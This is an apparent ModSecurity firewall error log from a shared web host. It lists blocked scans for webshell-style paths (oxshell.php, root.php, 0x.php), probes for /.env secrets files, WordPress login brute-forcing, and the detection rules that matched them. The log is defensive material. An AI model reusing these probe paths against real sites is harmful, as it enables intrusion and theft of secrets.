[Tue May 26 18:21:28.340540 2026] [security2:error] [pid 983082:tid 983253] [client 23.100.97.57:7862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/edit.php"] [unique_id "ahWXULvhpIlZJOtze4tKsAAAAK4"]
[Tue May 26 18:21:28.915280 2026] [security2:error] [pid 983082:tid 983241] [client 23.100.97.57:8273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/f35.php"] [unique_id "ahWXULvhpIlZJOtze4tKvQAAAKI"]
[Tue May 26 18:21:29.095179 2026] [security2:error] [pid 983082:tid 983237] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXT7vhpIlZJOtze4tKqAAAAJ4"]
[Tue May 26 18:21:29.509287 2026] [security2:error] [pid 983082:tid 983314] [client 23.100.97.57:10427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/fff.php"] [unique_id "ahWXUbvhpIlZJOtze4tKxAAAAOs"]
[Tue May 26 18:21:29.880172 2026] [security2:error] [pid 983082:tid 983275] [client 209.99.189.98:53655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/images/images/cache.php"] [unique_id "ahWXUbvhpIlZJOtze4tKyAAAAMQ"], referer: www.google.com
[Tue May 26 18:21:30.049934 2026] [security2:error] [pid 983082:tid 983323] [client 23.100.97.57:8272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/ff1.php"] [unique_id "ahWXUrvhpIlZJOtze4tK0AAAAPQ"]
[Tue May 26 18:21:30.622461 2026] [security2:error] [pid 983082:tid 983248] [client 23.100.97.57:5869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/flower.php"] [unique_id "ahWXUrvhpIlZJOtze4tK4wAAAKk"]
[Tue May 26 18:21:31.222843 2026] [security2:error] [pid 983082:tid 983239] [client 23.100.97.57:11935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/file.php"] [unique_id "ahWXU7vhpIlZJOtze4tK7gAAAKA"]
[Tue May 26 18:21:31.809116 2026] [security2:error] [pid 983082:tid 983259] [client 23.100.97.57:2562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/goods.php"] [unique_id "ahWXU7vhpIlZJOtze4tK-wAAALQ"]
[Tue May 26 18:21:31.941023 2026] [security2:error] [pid 983082:tid 983317] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXUrvhpIlZJOtze4tK4QAAAO4"]
[Tue May 26 18:21:32.381534 2026] [security2:error] [pid 983082:tid 983267] [client 23.100.97.57:10401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/g.php"] [unique_id "ahWXVLvhpIlZJOtze4tLAgAAALw"]
[Tue May 26 18:21:32.945941 2026] [security2:error] [pid 983082:tid 983323] [client 23.100.97.57:3400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/hplfuns.php"] [unique_id "ahWXVLvhpIlZJOtze4tLDAAAAPQ"]
[Tue May 26 18:21:33.483715 2026] [security2:error] [pid 983082:tid 983299] [client 23.100.97.57:6064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/ioxi-o.php"] [unique_id "ahWXVbvhpIlZJOtze4tLGwAAANw"]
[Tue May 26 18:21:33.904877 2026] [security2:error] [pid 983082:tid 983311] [client 45.154.98.38:49709] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWXVbvhpIlZJOtze4tLIQAAAOg"]
[Tue May 26 18:21:34.025903 2026] [security2:error] [pid 983082:tid 983225] [client 23.100.97.57:12595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/in.php"] [unique_id "ahWXVrvhpIlZJOtze4tLKAAAAJI"]
[Tue May 26 18:21:34.085046 2026] [security2:error] [pid 983082:tid 983237] [client 45.154.98.38:49709] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahWXVrvhpIlZJOtze4tLKwAAAJ4"]
[Tue May 26 18:21:34.290224 2026] [security2:error] [pid 983082:tid 983327] [client 85.11.167.19:35108] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webmail.pronumbers.com.au"] [uri "/.env"] [unique_id "ahWXVrvhpIlZJOtze4tLMgAAAPg"]
[Tue May 26 18:21:34.425864 2026] [security2:error] [pid 983082:tid 983294] [client 45.154.98.38:49709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "leakyleaks.moes-art.com"] [uri "/xmlrpc.php"] [unique_id "ahWXVrvhpIlZJOtze4tLMAAAANc"]
[Tue May 26 18:21:34.425992 2026] [security2:error] [pid 983082:tid 983294] [client 45.154.98.38:49709] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "leakyleaks.moes-art.com"] [uri "/xmlrpc.php"] [unique_id "ahWXVrvhpIlZJOtze4tLMAAAANc"]
[Tue May 26 18:21:34.468727 2026] [security2:error] [pid 983082:tid 983092] [remote 103.27.200.76:37722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWXVrvhpIlZJOtze4tLMQAA4gk"]
[Tue May 26 18:21:34.510105 2026] [security2:error] [pid 983082:tid 983282] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXVbvhpIlZJOtze4tLFQAAAMs"]
[Tue May 26 18:21:34.577439 2026] [security2:error] [pid 983082:tid 983290] [client 23.100.97.57:4659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/info.php"] [unique_id "ahWXVrvhpIlZJOtze4tLNgAAANM"]
[Tue May 26 18:21:34.767472 2026] [security2:error] [pid 983082:tid 983215] [client 85.11.167.19:35116] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "webmail.pronumbers.com.au"] [uri "/"] [unique_id "ahWXVrvhpIlZJOtze4tLOgAAAIg"]
[Tue May 26 18:21:35.010831 2026] [security2:error] [pid 983082:tid 983099] [remote 103.27.200.76:37722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWXVrvhpIlZJOtze4tLPwABARA"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:21:35.186169 2026] [security2:error] [pid 983082:tid 983251] [client 23.100.97.57:11957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/inputs.php"] [unique_id "ahWXV7vhpIlZJOtze4tLRwAAAKw"]
[Tue May 26 18:21:35.422922 2026] [security2:error] [pid 983082:tid 983108] [remote 46.224.234.158:56070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXV7vhpIlZJOtze4tLSgAAkBk"]
[Tue May 26 18:21:35.736068 2026] [security2:error] [pid 983082:tid 983283] [client 23.100.97.57:4625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/item.php"] [unique_id "ahWXV7vhpIlZJOtze4tLUwAAAMw"]
[Tue May 26 18:21:36.074808 2026] [security2:error] [pid 983082:tid 983323] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXV7vhpIlZJOtze4tLQgAAAPQ"]
[Tue May 26 18:21:36.278231 2026] [security2:error] [pid 983082:tid 983225] [client 23.100.97.57:5868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/k.php"] [unique_id "ahWXWLvhpIlZJOtze4tLWgAAAJI"]
[Tue May 26 18:21:36.868495 2026] [security2:error] [pid 983082:tid 983294] [client 23.100.97.57:9309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/license.php"] [unique_id "ahWXWLvhpIlZJOtze4tLZwAAANc"]
[Tue May 26 18:21:37.413728 2026] [security2:error] [pid 983082:tid 983279] [client 23.100.97.57:10098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/load.php"] [unique_id "ahWXWbvhpIlZJOtze4tLcQAAAMg"]
[Tue May 26 18:21:37.971758 2026] [security2:error] [pid 983082:tid 983224] [client 23.100.97.57:7975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/manager.php"] [unique_id "ahWXWbvhpIlZJOtze4tLewAAAJE"]
[Tue May 26 18:21:38.498409 2026] [security2:error] [pid 983082:tid 983252] [client 23.100.97.57:6039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/media.php"] [unique_id "ahWXWrvhpIlZJOtze4tLhwAAAK0"]
[Tue May 26 18:21:38.816641 2026] [security2:error] [pid 983082:tid 983113] [remote 162.214.79.109:57934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWXWrvhpIlZJOtze4tLigAA-h4"]
[Tue May 26 18:21:39.031746 2026] [security2:error] [pid 983082:tid 983234] [client 23.100.97.57:9083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/mar.php"] [unique_id "ahWXW7vhpIlZJOtze4tLlQAAAJs"]
[Tue May 26 18:21:39.061876 2026] [security2:error] [pid 983082:tid 983268] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXWbvhpIlZJOtze4tLdAAAAL0"]
[Tue May 26 18:21:39.143784 2026] [security2:error] [pid 983082:tid 983260] [client 209.99.189.98:54449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/images/images/cache.php"] [unique_id "ahWXW7vhpIlZJOtze4tLlgAAALU"], referer: www.google.com
[Tue May 26 18:21:39.569228 2026] [security2:error] [pid 983082:tid 983305] [client 23.100.97.57:9661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/my1.php"] [unique_id "ahWXW7vhpIlZJOtze4tLnQAAAOI"]
[Tue May 26 18:21:40.106730 2026] [security2:error] [pid 983082:tid 983314] [client 23.100.97.57:11949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/mm.php"] [unique_id "ahWXXLvhpIlZJOtze4tLqwAAAOs"]
[Tue May 26 18:21:40.684798 2026] [security2:error] [pid 983082:tid 983298] [client 23.100.97.57:10398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/network.php"] [unique_id "ahWXXLvhpIlZJOtze4tLtAAAANs"]
[Tue May 26 18:21:41.247684 2026] [security2:error] [pid 983082:tid 983272] [client 23.100.97.57:11763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/new.php"] [unique_id "ahWXXbvhpIlZJOtze4tLxAAAAME"]
[Tue May 26 18:21:41.817485 2026] [security2:error] [pid 983082:tid 983250] [client 23.100.97.57:10600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/0x.php"] [unique_id "ahWXXbvhpIlZJOtze4tL1AAAAKs"]
[Tue May 26 18:21:42.275059 2026] [security2:error] [pid 983082:tid 983283] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXXLvhpIlZJOtze4tLuwAAAMw"]
[Tue May 26 18:21:42.393759 2026] [security2:error] [pid 983082:tid 983223] [client 23.100.97.57:3446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/0.php"] [unique_id "ahWXXrvhpIlZJOtze4tL3wAAAJA"]
[Tue May 26 18:21:42.969390 2026] [security2:error] [pid 983082:tid 983089] [remote 216.73.217.110:7636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/online.php"] [unique_id "ahWXXrvhpIlZJOtze4tL7wAAyAY"]
[Tue May 26 18:21:42.974955 2026] [security2:error] [pid 983082:tid 983332] [client 23.100.97.57:7977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/oxshell.php"] [unique_id "ahWXXrvhpIlZJOtze4tL8AAAAP0"]
[Tue May 26 18:21:43.348890 2026] [security2:error] [pid 983082:tid 983091] [remote 74.7.241.58:40826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWXX7vhpIlZJOtze4tL9QAAuAg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:21:43.519188 2026] [security2:error] [pid 983082:tid 983272] [client 23.100.97.57:7181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/php8.php"] [unique_id "ahWXX7vhpIlZJOtze4tL_QAAAME"]
[Tue May 26 18:21:44.078613 2026] [security2:error] [pid 983082:tid 983259] [client 23.100.97.57:10103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/p.php"] [unique_id "ahWXYLvhpIlZJOtze4tMDAAAALQ"]
[Tue May 26 18:21:44.214949 2026] [security2:error] [pid 983082:tid 983213] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXXrvhpIlZJOtze4tL7gAAAIY"]
[Tue May 26 18:21:44.669433 2026] [security2:error] [pid 983082:tid 983244] [client 23.100.97.57:11964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/php.php"] [unique_id "ahWXYLvhpIlZJOtze4tMGwAAAKU"]
[Tue May 26 18:21:45.224652 2026] [security2:error] [pid 983082:tid 983292] [client 23.100.97.57:3023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/past.php"] [unique_id "ahWXYbvhpIlZJOtze4tMKgAAANU"]
[Tue May 26 18:21:45.767343 2026] [security2:error] [pid 983082:tid 983313] [client 23.100.97.57:11368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/root.php"] [unique_id "ahWXYbvhpIlZJOtze4tMOQAAAOo"]
[Tue May 26 18:21:47.197307 2026] [security2:error] [pid 983082:tid 983266] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXYbvhpIlZJOtze4tMNwAAALs"]
[Tue May 26 18:21:47.273230 2026] [security2:error] [pid 983082:tid 983225] [client 23.100.97.57:6620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/r.php"] [unique_id "ahWXY7vhpIlZJOtze4tMWgAAAJI"]
[Tue May 26 18:21:47.674028 2026] [security2:error] [pid 983082:tid 983121] [remote 146.19.215.203:58351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXY7vhpIlZJOtze4tMXwAA1SY"]
[Tue May 26 18:21:47.809114 2026] [security2:error] [pid 983082:tid 983212] [client 23.100.97.57:11995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/sid3.php"] [unique_id "ahWXY7vhpIlZJOtze4tMYwAAAIU"]
[Tue May 26 18:21:48.354583 2026] [security2:error] [pid 983082:tid 983259] [client 23.100.97.57:5217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/ss.php"] [unique_id "ahWXZLvhpIlZJOtze4tMcAAAALQ"]
[Tue May 26 18:21:48.623636 2026] [security2:error] [pid 983082:tid 983126] [remote 146.19.215.203:58824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWXZLvhpIlZJOtze4tMegAA5Cs"]
[Tue May 26 18:21:48.889091 2026] [security2:error] [pid 983082:tid 983320] [client 23.100.97.57:5884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/sts.php"] [unique_id "ahWXZLvhpIlZJOtze4tMkQAAAPE"]
[Tue May 26 18:21:49.332852 2026] [security2:error] [pid 983082:tid 983289] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXZLvhpIlZJOtze4tMbAAAANI"]
